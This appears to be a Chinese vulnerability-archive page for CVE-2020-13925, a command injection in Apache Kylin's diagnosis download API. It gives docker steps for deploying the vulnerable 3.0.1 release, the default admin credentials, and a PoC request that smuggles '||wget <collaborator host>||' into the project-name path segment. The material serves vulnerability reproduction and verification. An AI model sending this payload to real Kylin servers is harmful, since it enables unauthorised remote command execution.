关联漏洞
标题:Apache Kylin 安全漏洞 (CVE-2020-13925)Description:Apache Kylin是美国阿帕奇(Apache)基金会的一款开源的分布式分析型数据仓库。该产品主要提供Hadoop/Spark之上的SQL查询接口及多维分析(OLAP)等功能。 Apache Kylin中存在安全漏洞,该漏洞源于某一API没有进行输入验证。远程攻击者可利用该漏洞执行命令。以下产品及版本受到影响:Apache Kylin 2.3.0版本版本,2.3.1版本版本,2.3.2版本版本,2.4.0版本版本,2.4.1版本版本,2.5.0版本版本,2.5.1版本版本,2.5.2版本,2.6.0版
介绍
# CVE-2020-13925
### 环境搭建
参考 [https://github.com/apache/kylin](https://github.com/apache/kylin) 使用docker进行环境部署,修改其中的版本为3.0.1(存在漏洞的版本)。可以去除 【-m 8G \ 】它的作用是分配内存的大小。
然后访问 [http://host:7070/kylin/login](http://127.0.0.1:7070/kylin/login) 初始用户名和密码是 `ADMIN/KYLIN`。
```bash
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
```
### 漏洞验证PoC
```python
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||
```
### 复现步骤
访问 System-Configuration-Diagnosis。触发下载诊断信息的请求 [http://host:port/kylin/api/diag/project/learn_kylin/download](http://120.76.179.151:7070/kylin/api/diag/project/learn_kylin/download)
即将项目名称“learn_kylin”替换为如上payload访问即可。
### 参考链接
https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ
文件快照
[4.0K] /data/pocs/7df966428219bbaf455e1690be8f4b4b317ecc29
├── [4.0K] image
│ ├── [155K] 111.png
│ └── [381K] 222.png
└── [1.6K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。